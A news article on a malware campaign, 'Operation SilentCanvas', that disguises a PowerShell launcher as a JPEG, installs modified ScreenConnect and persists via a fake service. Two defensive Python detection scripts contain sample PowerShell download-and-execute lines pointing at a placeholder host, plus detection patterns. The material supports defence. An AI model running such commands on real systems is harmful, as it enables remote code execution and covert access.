Security experts warn of a sophisticated JPEG malware campaign targeting enterprises
Researchers warn of a sophisticated JPEG malware campaign using fake image files to deploy remote access malware.
Cybersecurity researchers have uncovered a new malware campaign that disguises malicious software as harmless JPEG image files, apparently to compromise businesses and organisations using remote administration tools.
Researchers at Cyfirma described the operation as “Operation SilentCanvas” and warned that the campaign demonstrates an advanced level of technical sophistication. The attack uses files disguised as standard image formats to trick victims into launching malware capable of stealing credentials, monitoring activity and maintaining long-term access to infected systems.
The researchers said the exact scale of the campaign remains unclear, with no confirmed number of victims or successful infections disclosed. However, the operation is believed to focus primarily on enterprise environments where remote access software is commonly used for system management and support tasks.
Attack disguises malware as an image file
According to the report, the attack begins when a victim downloads and opens a file named “sysupdate.jpeg”. Although the file appears to be an ordinary image, it instead launches a malicious PowerShell script designed to compromise the system.
Researchers said the malicious file could be distributed through several methods, including phishing emails containing infected attachments, deceptive file-sharing services or fake software updates intended to lure unsuspecting users. The campaign relies heavily on social engineering tactics to persuade victims that the file is safe.
Once executed, the malware downloads additional payloads from attacker-controlled infrastructure and installs a modified version of ConnectWise ScreenConnect, a legitimate remote administration platform commonly used by IT teams. The altered software allows attackers to gain covert remote access to infected devices while avoiding immediate detection.
The malware also attempts to bypass Windows security protections by creating malicious Registry entries and establishing persistence through a fake Windows service named “OneDriveServers”. This allows the attackers to maintain access to compromised systems even after reboots or user logouts.
Researchers noted that the campaign uses encrypted communications to connect with command-and-control infrastructure, helping attackers conceal their activity from security monitoring systems.
Malware capable of surveillance and credential theft
The report found that the malware includes a wide range of surveillance and data theft capabilities. These include credential harvesting, system fingerprinting, screen capture, microphone recording and clipboard monitoring.
Cybersecurity analysts warned that these functions could allow attackers to gather sensitive corporate information, monitor employee activity and move laterally across enterprise networks. Such capabilities are often associated with espionage campaigns or ransomware operations.
Cyfirma described the campaign as highly advanced and professionally organised. The company stated: “The overall tradecraft reflects a professionally engineered and operationally mature intrusion framework capable of supporting long-term covert persistence, credential theft, lateral movement, enterprise espionage, and potential ransomware deployment within enterprise environments.”
The researchers did not attribute the campaign to any known hacking group, country or region. However, the sophistication of the operation suggests it may be linked to experienced threat actors with significant technical resources.
The use of trusted remote administration software as part of the attack chain also reflects a growing trend in cybercrime operations. Threat actors increasingly exploit legitimate tools to blend malicious activity with normal network traffic, making detection more difficult for security teams.
Experts have repeatedly warned that file extensions alone should not be trusted when downloading content from the internet. Attackers often disguise malware as harmless documents, images or software installers to increase the likelihood of infection.
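A defender-side check for the point above: compare a file's extension with the bytes it actually starts with, so a ".jpeg" that does not begin with a JPEG signature is flagged before anyone opens it. This is an added example, not code from Cyfirma's report; the signature table is standard, the script-hint strings and the sample contents are constructed for illustration.

```python
import os

# Leading bytes of formats malware commonly impersonates (well-known signatures).
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".pdf": (b"%PDF-",),
}
# Fragments that suggest the "image" is really a script (assumed heuristics, not from the report).
SCRIPT_HINTS = (b"powershell", b"invoke-", b"downloadstring", b"iex(", b"iex ", b"$env:", b"<script")

def classify_bytes(name: str, head: bytes) -> str:
    """Compare a file's extension with the bytes it actually starts with.
    Returns "ok", "mismatch", "mismatch-script" or "unknown-extension"."""
    ext = os.path.splitext(name)[1].lower()
    expected = MAGIC.get(ext)
    if expected is None:
        return "unknown-extension"
    if any(head.startswith(sig) for sig in expected):
        return "ok"
    if any(hint in head[:512].lower() for hint in SCRIPT_HINTS):
        return "mismatch-script"
    return "mismatch"

def classify_file(path: str) -> str:
    """Read only the first 512 bytes; that is enough to check any signature above."""
    with open(path, "rb") as fh:
        return classify_bytes(os.path.basename(path), fh.read(512))

# Constructed samples: a genuine JPEG header and a ".jpeg" whose content is really a script launcher.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
FAKE_JPEG = b'powershell -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString(\'http://example.invalid/p\'))"'

if __name__ == "__main__":
    print("photo.jpeg     ->", classify_bytes("photo.jpeg", REAL_JPEG))
    print("sysupdate.jpeg ->", classify_bytes("sysupdate.jpeg", FAKE_JPEG))
```

Run `classify_file` over a download directory or mail-gateway quarantine to surface extension/content mismatches in bulk.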
Organisations urged to strengthen monitoring
Security specialists said organisations should closely monitor Windows system processes that attackers commonly abuse during malware deployment. Cyfirma specifically highlighted binaries such as “csc.exe”, “cvtres.exe” and “ComputerDefaults.exe” as potential tools used during the attack chain.
Where possible, businesses were advised to restrict or block these binaries if they are not required for day-to-day operations. Researchers also recommended stricter controls around remote access platforms to reduce the risk of unauthorised access.
The report further urged organisations to implement enhanced monitoring rules for suspicious PowerShell activity, as PowerShell remains one of the most frequently exploited tools in Windows-based cyberattacks. Unusual PowerShell execution patterns can often provide an early warning sign of compromise.
Cybersecurity teams were also advised to isolate any systems exhibiting unexpected ScreenConnect activity immediately. Rapid containment measures may help prevent attackers from spreading across networks or deploying additional malware.
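The monitoring advice in the four paragraphs above, turned into triage logic that runs over process-creation and service-install events: it flags the binaries the report names, the rogue "OneDriveServers" service, ScreenConnect activity for review, and PowerShell command lines with common red flags. This is an added example, not Cyfirma's detection content; the PowerShell patterns, the higher severity when a watched binary is spawned by PowerShell, the event field names and the sample telemetry are all assumptions constructed for illustration.

```python
import re

# Process names the report says to watch, and the rogue service name it describes.
WATCHED_BINARIES = {"csc.exe", "cvtres.exe", "computerdefaults.exe"}
ROGUE_SERVICE_NAMES = {"onedriveservers"}
# Generic PowerShell red flags (assumed, not from the report): encoded/hidden runs, in-memory download/eval.
POWERSHELL_RED_FLAGS = re.compile(
    r"-e(nc(odedcommand)?)?\s|-w(indowstyle)?\s+hidden|downloadstring|invoke-expression|\biex\b", re.I)
PS_HOSTS = {"powershell.exe", "pwsh.exe"}

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def triage_event(ev: dict) -> list:
    """Return (severity, reason) findings for one process-creation or service-install event."""
    findings = []
    if ev["event"] == "process":
        img, parent = basename(ev["image"]), basename(ev.get("parent", ""))
        cmd = ev.get("cmdline", "")
        if img in WATCHED_BINARIES:
            sev = "high" if parent in PS_HOSTS else "medium"  # assumption: PowerShell parent is worse
            findings.append((sev, f"watched binary {img} launched by {parent or 'unknown'}"))
        if img in PS_HOSTS and POWERSHELL_RED_FLAGS.search(cmd):
            findings.append(("high", "suspicious PowerShell command line"))
        if "screenconnect" in (ev["image"] + " " + cmd).lower():
            findings.append(("medium", "ScreenConnect activity: confirm it is sanctioned"))
    elif ev["event"] == "service":
        if ev["name"].lower() in ROGUE_SERVICE_NAMES:
            findings.append(("high", f"service name {ev['name']} matches known rogue service"))
    return findings

def triage(events: list) -> list:
    """Run every event through triage_event; returns (event_index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) for f in triage_event(ev)]

# Constructed sample telemetry (not from the report): one benign event, then lookalikes of the described chain.
SAMPLE_EVENTS = [
    {"event": "process", "image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"event": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "IEX((New-Object Net.WebClient).DownloadString(\'http://example.invalid/x\'))"'},
    {"event": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"csc.exe /noconfig /fullpaths @C:\Users\jdoe\AppData\Local\Temp\abc.cmdline"},
    {"event": "service", "name": "OneDriveServers", "path": r"C:\ProgramData\OneDrive\svc.exe"},
    {"event": "process", "image": r"C:\Windows\System32\ComputerDefaults.exe", "parent": r"C:\Windows\explorer.exe", "cmdline": "ComputerDefaults.exe"},
]

if __name__ == "__main__":
    for idx, (sev, why) in triage(SAMPLE_EVENTS):
        print(f"event {idx}: [{sev}] {why}")
```

Feed it Sysmon or EDR process and service events mapped to the same field names; the high-severity findings are the ones worth isolating a host over.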
The discovery of Operation SilentCanvas highlights the continued evolution of cybercriminal tactics and the growing challenge businesses face in defending against increasingly deceptive attacks. As threat actors adopt more sophisticated delivery methods and stealth techniques, experts said user awareness and proactive monitoring remain essential parts of enterprise security strategies.